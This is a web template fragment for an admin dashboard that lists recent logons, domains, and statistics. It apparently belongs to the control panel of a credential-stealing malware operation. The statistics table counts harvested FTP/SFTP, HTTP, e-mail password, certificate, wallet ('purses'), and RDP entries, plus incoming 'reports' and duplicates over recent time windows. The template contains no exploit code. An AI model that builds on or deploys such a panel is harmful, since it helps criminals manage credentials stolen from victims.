{if ($show_logons_to_users || $priv_is_admin) && !$disable_ip_logger} {if count($login_list)}

LAST LOGONS

{foreach from=$login_list item=login_item} {/foreach}
Login IP Country Login Time
{$login_item.user} {$login_item.ip} {country base_path="includes/design/images/flags/" country_code=$login_item.country_code country_name=$login_item.country_name} {$login_item.import_time}

{/if} {/if} {if $show_domains && ($show_domains_to_users || $priv_is_admin)} {if count($domain_list)}

Domains

{foreach from=$domain_list item=domain_item} {/foreach}
Domain Name Status
{$domain_item.url}


{/if} {/if} {if $enable_http_mode && ($show_http_to_users || $priv_is_admin)} {/if} {if $enable_email_mode && ($show_email_to_users || $priv_is_admin)} {/if} {if $show_other_to_users || $priv_is_admin} {/if} {if $show_other_to_users || $priv_is_admin} {/if} {if $enable_http_mode && ($show_http_to_users || $priv_is_admin)} {else} {/if}
Statistics
Server Time{$server_time}
FTP/SFTP List{$total_ftp_items_count+$total_ssh_items_count}
HTTP/HTTPS List{$total_http_items_count}
E-mail Passwords List{$total_email_items_count}
Certificates List{$total_cert_items_count}
Purses List{$total_wallet_items_count}
RDP List{$total_rdp_items_count}
Unique Reports{$total_reports_count}
Duplicates Received{$report_duplicates}
Reports Not Processed{$total_nonparsed_reports}
Events in System Logs{$log_events_count}
Total Size of Reports in the Database{$total_reports_size|file_size}
Total Database Size{$db_size|file_size}
Added FTP (HTTP) - Last 24 Hours{$new_ftp_last_24_hours} ({$new_http_last_24_hours})
Added FTP (HTTP) - Last Hour{$new_ftp_last_hour} ({$new_http_last_hour})
Added FTP (HTTP) - Last 10 Minutes{$new_ftp_last_10_minutes} ({$new_http_last_10_minutes})
Added FTP in the Last 24 Hours{$new_ftp_last_24_hours}
Added FTP in the Last Hour{$new_ftp_last_hour}
Added FTP in the Last 10 Minutes{$new_ftp_last_10_minutes}
Added Reports in the Last 24 Hours{$new_reports_last_24_hours}
Added Reports in the Last Hour{$new_reports_last_hour}
Added Reports in the Last 10 Minutes{$new_reports_last_10_minutes}